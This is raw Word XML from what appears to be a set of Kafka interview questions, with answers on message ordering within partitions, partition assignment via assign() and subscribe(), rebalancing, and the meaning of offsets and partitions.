    <w:p w14:paraId="0B0637B4"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each partition is consumed by only </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Scalability and Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2148BC1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horizontally by adding </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>more partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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so enabl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Replicas</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681C87A1"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has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>replica</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w:rsidRDefault="009964FC" w:rsidP="009964FC">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="017AB6B8"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5BC05BA0"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Topic</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A logical categorization for data streams in Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87FE76"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A physical storage unit for the topic's data, enabling parallelism, scalability, and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E822D9" w14:textId="28BDB804" w:rsidR="009964FC" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009964FC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2C67E4B5">
          <v:rect id="_x0000_i3311" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="312321A1" w14:textId="7179E3A1" w:rsidR="006E0265" w:rsidRPr="00CE4B95" w:rsidRDefault="00E80EE7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="820" w:name="_Toc197868034"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Is there any ordering of messages in partitions in kafka</w:t>
      </w:r>
      <w:r w:rsidR="006E0265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="820"/>
    </w:p>
    <w:p w14:paraId="4F5E78CA" w14:textId="42C9F6C7" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="0086529D"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essage ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>guaranteed within a partition</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764CADB4"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about Ordering of Messages in Kafka Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B0C7CD"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Ordering within a Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EDF596"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>messages within a single partition are strictly ordered</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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message in a partition is assigned a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unique offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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No Ordering Across Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4187D99F"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does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guarantee any ordering</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Why Ordering is Guaranteed within Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB8F160"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FB6417F"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0: Message 1, Message 2, Message 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8ED031"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1: Message 4, Message 5, Message 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5B0B5"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0 is guaranteed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8DF79"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1 will read Message 1, then Message 2, then Message 3 from partition 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD22F5A"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1 is also guaranteed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F560E"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2 will read Message 4, then Message 5, then Message 6 from partition 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23452011"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Kafka does not guarantee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Practical Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5236DE8E"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control which partition they send messages to, usually by using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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If strict message ordering is required across different types of messages, you should use a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208D7E78"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ordering is guaranteed </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>within a partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F397CA2"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No</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, ordering is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not guaranteed across partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8720C7" w14:textId="24C612F2" w:rsidR="0086529D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0086529D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="49A39CE0">
          <v:rect id="_x0000_i3312" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F7DECB" w14:textId="5BFC5215" w:rsidR="006E0265" w:rsidRPr="00CE4B95" w:rsidRDefault="005A4658">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="821" w:name="_Toc197868035"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How does partition assignment happen? What method is used</w:t>
      </w:r>
      <w:r w:rsidR="006E0265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="821"/>
    </w:p>
    <w:p w14:paraId="6161EA08" w14:textId="23E893CC" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>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partition assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> refers to the process of determining which consumer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load balancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C2228"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How Partition Assignment Happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D970590"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of Partition Assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4920E1D9"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Each Partition Is Assigned to One Consumer in a Consumer Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85163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of a topic is assigned to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one consumer</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This ensures that each message within a partition is consumed only once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B1909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0566472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a new consumer joins or an existing consumer leaves the group, Kafka perform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to reassign partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4B02F"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During a rebalance, Kafka ensures that partitions are evenly distributed across available consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A7CF11"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Strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Default):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03ED372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544488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s 0-2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6441F0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s 3-4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C0B740"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s 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4301F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AF5A45"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49EE4B42"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 1: Partition 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CA0D39"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1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436A334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2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DF00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 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E101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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352C0A2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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758DBB00"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Custom Partition Assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594BEA7B"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Methods Used for Partition Assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9DCAD8"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assign() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for manual assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537B83E7"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You can manually assign partitions to consumers using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assign()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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manual assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA67634"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4A415812" w14:textId="010A4033"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sig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1865414"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In this case, partitions 0 and 1 of the topic my-topic are explicitly assigned to the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39543B50"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subscribe() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (for automatic assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7440CE"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using the </w:t>
      </w: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automatic assignment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C0F55D"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6CEE98A9" w14:textId="439BAB5E"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crib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p>
    <w:p w14:paraId="47BE0FE9"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teps in Partition Assignment Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D68F5"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Consumer Joins the Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F07F5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Algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA624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then uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assigned strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Assign Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C2AB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195D04B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new consumer joins or an existing consumer leaves, Kafka trigger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ummary of Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6485B"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assign()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manually assign specific partitions to a consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D28282"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6C4FF7A5"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Pr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025797A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="43EBAB41">
          <v:rect id="_x0000_i3313" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0D34F" w14:textId="053DE001" w:rsidR="001D168B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D168B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="822" w:name="_Toc197868036"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is offset and partition in Kafka?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="822"/>
    </w:p>
    <w:p w14:paraId="09F7284E" w14:textId="6A43EF63" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00FC2EFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="710"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserv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CE4B95" w:rsidRDefault="00A0443E" w:rsidP="00A0443E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D1EDFB"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lastRenderedPageBreak/>
        <w:t>1. Partition in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3B87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Partitions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63966C8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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Distributed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Parallelism</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">: Partitions allow Kafka consumers to read messages in parallel. Each consumer in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Independent Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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07DD9A61" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="251"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">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0: Stores a subset of orders data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE48854"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1: Stores another subset of orders data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4ECE9E"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2: Stores yet another subset of orders data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16593D8C"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2. Offset in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789AD58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n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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>persisten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monotonically increasing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a partition.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FED30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Offsets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F2302C"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Unique per Partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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Message Tracking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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No Ordering Across Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
